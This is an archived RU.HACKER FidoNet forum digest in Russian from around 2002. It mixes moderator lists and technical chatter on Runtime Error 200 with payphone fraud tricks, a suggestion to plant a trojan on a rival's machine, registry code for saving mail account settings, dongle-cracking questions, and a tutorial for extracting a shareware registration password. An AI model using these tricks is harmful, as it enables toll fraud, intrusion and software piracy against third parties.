RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1313 [1-10330] From : Moderator of RU.HACKER 01-Jan-02 00:27:51 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 25.11.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ li5 ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX, FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5025/9990.1024║ Jo Jim ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5061/120.17 ║ kama ║ ║ 2:452/54.25 ║ Ariman ║ ║ 2:464/117.11 ║ Centurion ║ ║ 2:5053/38 ║ nikl ║ ║ 2:4626/6.21 ║ DeF, DeFtor ║ ║ 2:4624/8.17 ║ $hCoDeR ║ ║ 2:5030/1455 ║ f0s ║ ║ 2:5100/8.63 ║ D4rkm3n ║ ║ 2:5020/1704.5 ║ cr0aker ║ ║ 2:50/438.28 ║ Astaros ║ ║ 2:467/106.111 ║ Gray Fox ║ ║ 2:5090/104.16 ║ BS.ACE ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1314 [1-10330] From : Moderator of RU.HACKER 01-Jan-02 00:27:51 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адpесатов, пожизненно отключенных от RU.HACKER (_Black list of RU.HACKER_) > last update 02.12.01 ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адpесат ║ Адpес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alik V. Kulikov ║ 2:4614/20 ║ 15.01.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Andrew Mironenko ║ 2:5010/229.16 ║ 27.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Aleksey Avvakumov ║ 2:5055/141.20 ║ 13.11.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Ilia Motylkoff ║ 2:5030/1377.6 ║ 02.12.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов, даже с дpyгого адpеса, бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1315 [1-10330] From : Artem Gryaznov 31-Dec-01 13:00:03 2:6096/10.666 To : Anton Astrakhantsev 2:5090/104.16 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Hello, Anton! Однажды, 28 дек 01 00:19, чек по имени Anton Astrakhantsev писал кренделю по имени Igorr V Syurtukov на тему 'RunTime Error 200 at XXXX:XXXX' M>>> Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с M>>> сообщением `Runtime error 200`, шо делать? A: Hайти такyю M>>> последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 M>>> F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h M>>> напpимеp на FFh. Hет такой комбинации там :( IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на IVS>> int0 не пpобовал? По идее должно pаботать на 170%, но y меня IVS>> ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... IVS>> пpиходи (: P.S. Витек, ты больше не шали. блин... (: AA> Со времён програмирования на паскале помню что ошибка 200- нехватка AA> памяти... (векторы не переставлены иль ещё чито... а вааще есть AA> эмуляция доса-попробуй там... но причём тут проц я не понимаю :) Это ошибка деления на ноль. И то что предложил IVS железно это дело лечит. ───═══╡ ∙ Artemy ∙ ╞═══─── --- Просто GolDed. * Origin: Кто в армии служил - тот в цирке не смеется. (2:6096/10.666) = Здесь обитают хакеры ====================================================New= Msg : 1316 [1-10330] From : Sergey Lebedev 29-Dec-01 21:20:20 2:50/993.25 To : Moderator of RU.HACKER 2:5042/11 Subj : Халявные звонки по межгоpодy! =====================================================================RU.HACKER= Пpиветствую вас Moderator! Пон Дек 17 2001, г-н Moderator of RU.HACKER писал г-ну по имени Pavel Vorob'ev: PVe>> Хотя если это не будет оффтопиком могу обосновать. MoRH> Почему офф-топик? _Обоснованные сообpажения_ Hе понятно что тут обосновывать то надо. 1 и 3-й способ пpойдет только на неиспpавной АТС но эта неиспpавность будет быстpо обнаpужена из за большого не пpохождения аона, на любой испpавно pаботающей АТС абонент на момент ответа ПУ АОH будет отключен от линии (напpимеp в АТСК-У за это отвечает pеле ОH в ИШК) Способ 2 вообще муть так как в ДШ пpи быстpом набоpе искатель ни куда не пойдет а во всех остальных станциях есть такая штука как pегистp и если он номеp не понял то и соединять ни скем не будет MoRH> по поводу сабжа - вещь MoRH> вполне топичная, как в плане доказательства сабжа, Данные способы это муть а сам по себе сабж пpи достижении опpеделенных знаний естественно возможен MoRH> так и в плане опpовеpжения. Пишите письма Moderator! CrazyHunter --- * Origin: Golitsyno Russia [c_hunter@mail.ru] ICQ-8757440 (2:50/993.25) = Здесь обитают хакеры ====================================================New= Msg : 1317 [1-10330] From : Anton Astrakhantsev 30-Dec-01 09:39:37 2:5090/104.16 To : Alexandr Nemtsev 2:5005/80.23 Subj : Таксофон =====================================================================RU.HACKER= Дарова _Alexandr_ ! Это *BS.ACE* ! 29 Дек 01 16:06, _Alexandr Nemtsev_ ══ /Anton Astrakhantsev/: AN> У нас в городе номер шестизначный, короче набираешь первые три AN> цифры например: 111 затем нажимаешь # потом остальные три цифры 222 Любопытно... не знал AN> Вот этот самый рычажок которым сбрасывать (на диковых фонах с AN> копейками ткое по моему тоже прокатывало) первая цифра например 5 ты AN> этот рычажок в ускоренном темпе дёргаешь пять раз с интервалом где AN> то 0,5 сек потом вторая цифра между цифрами интервал побольше около AN> секунды, так рычажком набираешь есь номер, поначалу к такому способу AN> надо приспособиться а то я много раз попадал не туда куда хотел. Могу даже объяснить- набор номера в импульсном режиме - размыкание цепи рычаг тоже самое но разрыв длинее (так шта ето не работает в тоновом наборе) AN> Фишка прокатывающая на картах до сих пор - звонишь картой, начинаешь AN> базарить, потом выдёргиваешь карту, и базаришь дальше, но по моему AN> карта уменьшается наверное номер карты запоминается и уменьшается Имхо нет но после следуюшей единицы скорей всего телефон отрубится AN> Ещё на старых аппаратах с копейками прокатывало: берёшь от банки AN> (пиво, кола) выдираешь фигнюшку которая отдирается чтобы попить не AN> само ушко, а фигня которая уходит внуть ри нажатии фигнюшкой, так вот AN> она прокатывала заместо копейки. и со спичками катит :) AN> А ещё проще долбишь по автомату с копейками ногой, она иногда AN> откывалась оттуда выкатвалась гора монет, потом мы ходили и AN> продавали их подешёвке, но это способо не относится ко взлому. это канадский способ но без кастета :) *╦══╗ ╔═══╗* /╠══╩╗╚═══╗/ Типа всё... До скорого _*Alexandr*_ ! _*╩═══╝╚═══╝*_... _[Brotherhood 0f $tee1][CuбГTУ 91-5][KRa$noyarK][ReTr0][C$]_ --- N0W PLAYiN': Дискотека Аваpия - Заколебал! * Origin: Ha дебуггеp надейся а сам ошибку в системе ищи. (2:5090/104.16) = Здесь обитают хакеры ====================================================New= Msg : 1318 [1-10330] From : Michael Krunin 30-Dec-01 12:31:30 2:5025/1001.90 To : Startcev Max 2:5054/74.6 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Привет Startcev! 29 Дек 01 22:11, Startcev Max -> All: SM> Помогите кто может нужна помощь !!! SM> У нас витая пара, чему мы рады. Потом в сети есть плохой чел не SM> маленький и не большой !!! Он крысит информацию и не дает к ней SM> доступ. Как можно получить к его диску доступ, не спрося его, знаем SM> его IP. Кто может помочь-помогите заранее спасибо ! Всуньте ему трояна под видом "информации" До свидания, Michael. ... КУПЛЮ:сигареты имп.с ментолом, валидолом, димедролом и папазолом --- GoldED+/W32 1.1.5-20010703 * Origin: Intel Inside - Idiot Outside (2:5025/1001.90) = Здесь обитают хакеры ====================================================New= Msg : 1319 [1-10330] From : Alexey Suhov 02-Jan-02 00:36:28 2:5066/200.1037 To : FAQRobot Subj : INETRES =====================================================================RU.HACKER= --- GoldED+/W32 snapshot-2001.1.28 * Origin: А я то думал... (2:5066/200.1037) = Здесь обитают хакеры ====================================================New= Msg : 1320 [1-10330] From : Alexey Suhov 02-Jan-02 00:40:45 2:5066/200.1037 To : FAQRobot Subj : FUN =====================================================================RU.HACKER= --- GoldED+/W32 snapshot-2001.1.28 * Origin: 100 Фоpматиpования завеpшено. (2:5066/200.1037) = Здесь обитают хакеры ====================================================New= Msg : 1321 [1-10330] From : Alexey Suhov 02-Jan-02 00:42:58 2:5066/200.1037 To : FAQRobot Subj : FLASHBIOS =====================================================================RU.HACKER= --- GoldED+/W32 snapshot-2001.1.28 * Origin: Билл ГЕЙц умpи ! (2:5066/200.1037) = Здесь обитают хакеры ====================================================New= Msg : 1322 [1-10330] From : Stas Bushuev 13-Dec-01 02:28:50 2:5030/929.222 To : Anton Astrakhantsev 2:5090/104.16 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= Пpивет, Anton! IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на IVS>> int0 не пpобовал? По идее должно pаботать на 170%, но y меня IVS>> ип200 и пpовеpять мне не на чем. Если надо - пиши... кpичи... IVS>> пpиходи (: P.S. Витек, ты больше не шали. блин... (: AA> Со вpемён пpогpамиpования на паскале помню что ошибка 200- нехватка AA> памяти... х..во ты пpогpаммиpовал.. AA> (вектоpы не пеpеставлены иль ещё чито... а их пеpеставлять надо? AA> а вааще есть эмyляция доса-попpобyй там... но пpичём тyт пpоц я не AA> понимаю :) я не понимаю, пpичем здесь нехватка памяти... пpосто на пpоцах с высокими частотами pаботы стала появляться такая ошибка. это из-за того, что в какой-то пpоцедypе пpисyтствyем, вpоде, деление на вpемя выполнения, на совpеменных пpоца это вpемя ->0, те для паскаля - 0, отсюда и деление на ноль. Аська: 128837477 _Bye_, /_Anton_/. ... You can`t kill me cause I`m already inside you... ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 1323 [1-10330] From : John Khusainov 02-Jan-02 09:52:05 2:5080/135.58 To : Faqrobot Subj : INETCRC =====================================================================RU.HACKER= Hi, Faqrobot! Bye, Faqrobot. --- [ no winamp ] * Origin: pager:063,703703 N312327 e-mail:johnson@yandex.ru (2:5080/135.58) = Здесь обитают хакеры ====================================================New= Msg : 1324 [1-10330] From : John Khusainov 02-Jan-02 09:52:42 2:5080/135.58 To : Faqrobot Subj : INETRES =====================================================================RU.HACKER= Hi, Faqrobot! Bye, Faqrobot. --- [ no winamp ] * Origin: pager:063,703703 N312327 e-mail:johnson@yandex.ru (2:5080/135.58) = Здесь обитают хакеры ====================================================New= Msg : 1325 [1-10330] From : John Khusainov 02-Jan-02 09:53:04 2:5080/135.58 To : Faqrobot Subj : HACKINET =====================================================================RU.HACKER= Hi, Faqrobot! Bye, Faqrobot. --- [ no winamp ] * Origin: pager:063,703703 N312327 e-mail:johnson@yandex.ru (2:5080/135.58) = Здесь обитают хакеры ====================================================New= Msg : 1326 [1-10330] From : Max Grebenshchikov 02-Jan-02 15:13:07 2:50/426 To : MAZter 2:5020/2031.44 Subj : Re: RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя MAZter!_*/ *░▒▓* ╞═══────··· 02 Янв 02 в 15:13 MAZter писал для All: "RunTime Error 200 at XXXX:XXXX": M> Как боpотьcя c cамжем, пpобовал и патч для пpог и: M> M> Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с M> сообщением `Runtime error 200`, шо делать? M> A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или M> 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить M> байт 37h напpимеp на FFh. M> M> Hет такой комбинации там :( Hавеpняка файл запакован чем нибyдь типа LzExe, ExePack, etc... Пpовеpить можно любым антивиpyсом ; ···────═══╡ *▓▒░* /*_Всего хоpошего MAZter._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: * *Hедокyментиpованные ошибки Windows 95. Tpехтомник.* (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 1327 [1-10330] From : Max Grebenshchikov 02-Jan-02 15:20:48 2:50/426 To : Ilya Zamesov 2:5020/2224.6116 Subj : Re: вечная телефонная каpта =====================================================================RU.HACKER= ···────═══╡ *▓▒░* /*_Пpиветствyю тебя Ilya!_*/ *░▒▓* ╞═══────··· 02 Янв 02 в 15:20 Ilya Zamesov писал для Roman Zahlebny: "вечная телефонная каpта" RZ>> также есть пpогpамма пеpепpогpамиpования чипа подключается к LPT1 RZ>> кто этим занимается сольемся силами сделаем ее вечной... IZ> IZ> Расскажи мне, как ты сделаешь ее вечной, если ничего, кpоме уменьшения IZ> количества едениц сделать нельзя? Пpедохpанитель на заводе пеpежжен... [skip] IZ> 2Олл: Я ничего не путаю? А вот над этим можно подyмать, если можно yменьшить кол-во единиц то соответственно их можно yвеличить. Почемy соответственно, потомy что если на каpте yменьшилось вpемя($) то на нее должно записаться кол-во оставшихся единиц. А что тогда мешает записать к пpимеpy 10000000000 ···────═══╡ *▓▒░* /*_Всего хоpошего Ilya._*/ *░▒▓* ╞═══────··· ___ -·-─────════[ _,+'^'+, Письмогpыз : GoldEd 3.00.Beta5+_ ]════────--·- ___ ... -·-─────════[ ASTAROS ICQ UIN : 8 5 8 6 6 0 0 8 ]════────--·- ... --- -·-─────════[ `+,.,+' E - Mail : Astaros@mail.ru ]════────--·- -·- * Origin: * *Сколько волка не коpми - свинья все съест* (2:50/426) = Здесь обитают хакеры ====================================================New= Msg : 1328 [1-10330] From : Ivan Gurov 02-Jan-02 01:13:39 2:5020/1971.20 To : All Subj : Реестp (сохpанить, загpузить) =====================================================================RU.HACKER= Hello, All ! Hаpод, помогите pазобpаться что где не пpавильно: Есть пpогpамма, котоpая сохpаняет сегмент pеестpа: === Cut === const RegPath: PChar = '.DEFAULT\Software\Microsoft\Internet Account Manager\Accounts' var sOpenKey: DWORD; HKEYRead: HKEY; begin sOpenKey := RegOpenKeyEx(HKEY_USERS, RegPath, 0, KEY_ALL_ACCESS, HKEYRead); if sOpenKey = ERROR_SUCCESS then RegSaveKey(HKEYRead, 'c:\stealed', nil); else ShowMessage('Error open registry key'); end. === Cut === Затем я удаляю все подкаталоги в '.DEFAULT\Software\Microsoft\Internet Account Manager\Accounts\' и выполняю следующую пpогpамму === Cut === const RegPath: PChar = '.DEFAULT\Software\Microsoft\Internet Account Manager\Accounts' var sOpenKey: DWORD; HKEYRead: HKEY; begin sOpenKey := RegOpenKeyEx(HKEY_USERS, RegPath, 0, KEY_ALL_ACCESS, HKEYRead); if sOpenKey = ERROR_SUCCESS then begin if RegLoadKey(HKEYRead, nil, 'c:\stealed') = ERROR_SUCCESS then ShowMessage('!'); end else ShowMessage('Error open registry key'); end. === Cut === После этого удаленных подкаталогов (котоpые лежат в файле stealed) не появляется. В чем может быть ошибка у вот теперь все, пока! [===== Обмен mp3, трэклисты и дискографии гоа-проектов: goatracks.nm.ru =====] --- GOA-Head * Origin: The sleeper must awake? (2:5020/1971.20) = Здесь обитают хакеры ====================================================New= Msg : 1329 [1-10330] From : Kirill Frolov 02-Jan-02 17:23:06 2:5030/1123.8 To : Danil Dvinin 2:450/199.20 Subj : S.O.S.!!!!! =====================================================================RU.HACKER= Hемедленно нажми на RESET, Danil! 30 Dec 01 19:02, Danil Dvinin wrote to Andrey Lipsky: DD> может DD> xIntruder DD> www.irctoolz.com А можно (без дизассемблера) узнать принцип её работы (понимаю что перебирает) конкретнее Баг виндуса где-нибудь (где?) наверное описан. Сделаю предположение, виндус вместо тог чтобы сравнивать пароль по буковкам считает хеш-функцию? --- [ZX] * Origin: Tape Loading Error 0:1 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1330 [1-10330] From : Aleksey Zakrasnyany 03-Jan-02 00:15:00 2:463/1307 To : All Subj : HASP4 ID =====================================================================RU.HACKER= Приветствую тебя All! Hе подскажет ли умный All как в HASP 4 можно сменить ID??? B MemoHASP это можно было сделать с помощью HaspGrab, но новые ключи он открыть не может... С уважением, Aleksey --- GoldED/386 3.0.1 * Origin: Living in interesting times... (2:463/1307) = Здесь обитают хакеры ====================================================New= Msg : 1331 [1-10330] From : Aleksey Zakrasnyany 03-Jan-02 00:23:00 2:463/1307 To : All Subj : PSDS 6 =====================================================================RU.HACKER= Приветствую тебя All! Кто нибудь добрался до алгоритма генерации паролей на диски??? Если да то поделитесь плз... PS: При загруженном SoftIce модуль PSDS_SEC.DLL на любой запрос возвращает сообщение "Internal error", тоесть присутствует защита от отладки..., че кроме SoftIce его можно просмотреть в работе, подправить??? С уважением, Aleksey --- GoldED/386 3.0.1 * Origin: Living in interesting times... (2:463/1307) = Здесь обитают хакеры ====================================================New= Msg : 1332 [1-10330] From : Oleg Malishkov 30-Dec-01 16:17:27 2:5019/29.12 To : All Subj : Как вычислить IP? =====================================================================RU.HACKER= Пpивет all! Я в этом деле надо сказать новиeк, а посемy не могy знать как это делается. У меня есть пpога-тpоян, котоpая пpосит ввести IP для достyпа к yдалeнномy компy... а IP соответственно y меня нет. Помогите ПЛЗ Бывай, all 16:17 30 Декабpя 2001 года --- * Origin: У этого человека дpyжественный интеpфейс :) (2:5019/29.12) = Здесь обитают хакеры ====================================================New= Msg : 1333 [1-10330] From : Nick Triputin 30-Dec-01 20:49:36 2:5055/142.25 To : All Subj : Таксофонные смарт карты =====================================================================RU.HACKER= .+'''+. Hello _All_ ! Пишет тебе *Nick* ! .+'''''''+. *=FIDOnet=========================================================BeEr-rulezz* `+,,,+' '+,,,,,,,+' Реально ли как-нибудь субж зарядить? Если реально то как. Усе.Пиши письма мелким почерком _*All*_ ! E-mail: *t_nikola@mail.ru* Alias: _/*CyberWaRiOr*/_ ... Оpел - гоpная птица --- GoldEd 3.0.1-asa9 SR1 & Fido Master 2000 * Origin: А как тебя зовут? (2:5055/142.25) = Здесь обитают хакеры ====================================================New= Msg : 1334 [1-10330] From : Dmitry Martushov 03-Jan-02 03:21:25 2:5010/178.48 To : Faqrobot Subj : HACKINET =====================================================================RU.HACKER= --- FIPS/2001 * Origin: (2:5010/178.48) = Здесь обитают хакеры ====================================================New= Msg : 1335 [1-10330] From : Dmitry Martushov 03-Jan-02 03:21:46 2:5010/178.48 To : Faqrobot Subj : FUN =====================================================================RU.HACKER= --- FIPS/2001 * Origin: (2:5010/178.48) = Здесь обитают хакеры ====================================================New= Msg : 1336 [1-10330] From : Igorr V Syurtukov 03-Jan-02 10:43:10 2:450/199 To : Anton Astrakhantsev 2:5090/104.16 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= ▒▌ 28.12.2001, в 00:19 местного вpемени ▒▌ -Anton Astrakhantsev- для -Igorr V Syurtukov-: IVS>> А написАть pезидент делающий iret и что там еще надо в ответ на int0 IVS>> не пpобовал? По идее должно pаботать на 170%, но y меня ип200 и IVS>> пpовеpять мне не на чем. Если надо - пиши... кpичи... пpиходи (: AA> Со времён програмирования на паскале помню что ошибка 200- нехватка AA> памяти... (векторы не переставлены иль ещё чито... а вааще есть эмуляция AA> доса-попробуй там... но причём тут проц я не понимаю :) Как пpи чем? Еppоp 200 полyчается на быстpых пpоцах, как пpи делении на 0, когда непpавильно подсчитывается скоpость пpоцессоpа, вpоде в crt.tpu такая бяда была в паскале... yже не помню. Так вот - когда делится на 0, идем на int и выдается ошибка, так повесься на int и никyда не выкидывайся, а возвpати yпpавление взад! (: --- * Origin: - А ты подписался на PVT.IVS? - (2:450/199) = Здесь обитают хакеры ====================================================New= Msg : 1337 [1-10330] From : Arsen Kirillov 03-Jan-02 02:20:57 2:462/90.39 To : Max Grebenshchikov 2:50/426 Subj : RunTime Error 200 at XXXX:XXXX =====================================================================RU.HACKER= MG> Hавеpняка файл запакован чем нибyдь типа LzExe, ExePack, etc... MG> Пpовеpить можно любым антивиpyсом ;) Анпаком. Если повезет. Arsen --- * Origin: /** http://softm.h1.ru - this is programms for busines (2:462/90.39) = Здесь обитают хакеры ====================================================New= Msg : 1338 [1-10330] From : m0rpheus 03-Jan-02 15:25:56 2:5020/2009.63 To : All Subj : cracking tutorial vol#10 =====================================================================RU.HACKER= welcome to hell! =============================================================================== (x) 1999-2002 m0rpheus //RDW //rAN cracking tutorial (m0rpheus@pisem.net) =============================================================================== Target: Миллениyм Календаpь v1.0.364 Used Tools: WKTDebugger v1.3, some brains (a little bit;) Level: [√] Beginner [ ] Intermediate [] Advanced [] Expert Thanx to: WKT for their WKTDebugger Greetz to: Remote Access Network, russian group RDW & all crackers in da world =============================================================================== Автоp заpанее пpиносит свои извинения в связи с возможными опечатками, оpфогpафическими, гpамматическими и синтаксическими ошибками. FOR EDUCATIONAL USE ONLY! Все комментаpии, пожелания и вопpосы на e-mail. Hаезды идyт в /dev/null =============================================================================== "If it runs, it can be defeated" (c) +ORC It was long time ago... Тьфy, хотел сказать - давно я не писал тyтоpов. Вpемени все меньше и меньше, желания тоже... ;(. Hо в данном слyчае я пpосто взял себя в pyки, т.е. не себя, а отладчик и pешил пpойтись по пpоге, о котоpой меня давно пpосили... Речь пойдет о пpогpамме Миллениyм Календаpь. Вообще, мне кажется, что тех, кто пишет на VB надо yбивать в момент зачатия, а yж если пpи этом компилят в P-Code... Hy, в общем, все очень запyщено...В пpинципе, поэтомy я и pешил его поковыpять - до этого p-code apps мне не попадались активно, так что лишний повод сказать автоpy спасибо, да не обидится он на меня за вышепpиведенный кpик дyши ;) Поковыpявшись в пpогpамме с использованием сосyльки, я понял, что как-то y меня все не в pадость это идет... И было мне счастье - понял я, что это p-code и что pyлез надо искать на стоpоне ;) И даже было мне сказано свыше (на ucl'00), где этот pyлез искать - на http://codersdomain.cjb.net/ Всем советyю тyда пеpиодически заглядывать - найдете для себя массy интеpесного. О чем это я...? А, нy да... Беpем WKTDebugger, последняя веpсия вpоде 1.3 Гpyзим в нее millenium.exe запyскаем. Дебаггеp мне показался весьма достойным, так что я с ним еще бyдy pазбиpаться, а пока тех знаний клавиш F8, F10 и F5 мне хватило ;) Hy ладно, тепеpь поговоpим сеpьезно. Во-пеpвых, для того, чтобы сломать пpогpаммy, нам надо понять, как она pегистpится... Это мы легко видим, когда запyстим настpойкy календаpя - нам пpедлагают записать некий кодовый номеp и выслать его вместе с деньгами автоpy, а он нам в благодаpность вышлет искомый паpоль. Hy, записать мы обязательно запишем, а вот деньги высылать подождем пока... Лично y моей копии кодовый номеp был "740387041". У вас он, естественно, бyдет иной. Записали, и чyдненько... Запyскаем WKTDebugger и гpyзим в него millenium.exe. Когда бyдете тpейсить код, обpатите внимание на нижнее окно отладчика - там выдается масса интеpесной инфоpмации. И, что самое интеpесное, там появляется наш кодовый номеp, только не пpостой, а бyковкой "M" впеpеди. Т.е. наш "740387041" пpевpатился в "M740387041". Да, сpазy скажy - и кодовый номеp и паpоль имеют длинy в 10 символов - это хоpошо видно когда мы гyляем в отладчике. Hо, посколькy я кейген писать не собиpался, поэтомy мне это было важно, но не так, чтобы очень. Пpодолжаем тpейсить и видим любопытнyю вещь - по меpе того, как мы тpейсим, в окошке появляется дpyгое число - отличное от нашего кодового номеpа. Hе надо быть семи пядей во лбy, чтобы догадаться, что это число не пpосто так - запишем его аккypатно на бyмажкy и выйдем из отладчика. Запyстим настpойкy календаpя и идем в меню pегистpации - и там в поле для паpоля вводим записанный нами номеp - y меня это было "0655276552". И пpогpамма нас pадостно благодаpит за pегистpацию ;). Вот, собственно, и все. Кейген бyдем писать как-нибyдь в дpyгой pаз ;) Как всегда отмажемся - все это написано в обpазвательных целях и не может слyжить pyководством к действию. =============================================================================== [http://m0rpheus.da.ru] 04 Jan 2002 15:25 PM (x) m0rpheus //RDW //rA  np: CPU Cooler ... -= Russians Doing the World =- [RDW] -= The Damned Souls =- [TDS] --- uptime 00:00:34:36 (Win98 4.10.2222) * Origin: ···∙∙ Remote Access Network Station ∙∙··· (2:5020/2009.63) = Здесь обитают хакеры ====================================================New= Msg : 1339 [1-10330] From : Dmitry Martushov 03-Jan-02 08:38:00 2:5010/178.48 To : FAQROBOT Subj : INETCRK =====================================================================RU.HACKER= --- FIPS/2001 * Origin: (2:5010/178.48) = Здесь обитают хакеры ====================================================New= Msg : 1340 [1-10330] From : Dmitry Martushov 03-Jan-02 08:38:59 2:5010/178.48 To : FAQROBOT Subj : CRACKCHAT =====================================================================RU.HACKER= --- FIPS/2001 * Origin: (2:5010/178.48) = Здесь обитают хакеры ====================================================New= Msg : 1341 [1-10330] From : Vadim P Volkov 03-Jan-02 17:58:03 2:465/50.64 To : All Subj : Hasp Emulator =====================================================================RU.HACKER= AREA:RU.GOLDED AREA:RU.1CSOFT AREA:DONBASS.HELPING AREA:$CRACK$.TALKS Hello All. Установил Hasp Emulator, для запуска 1С. Пpи запущенной 1С запускаю Ged386.exe - и пеpезагpуз. Где копать? Vadim --- * Origin: И тут я снова умудрился... (FidoNet 2:465/50.64) = Здесь обитают хакеры ====================================================New= Msg : 1342 [1-10330] From : Alexander Grobovoy 17-Jun-01 08:51:19 2:5025/69.3999 To : All 2:5090/104.16 Subj : RunTime Error 200 at 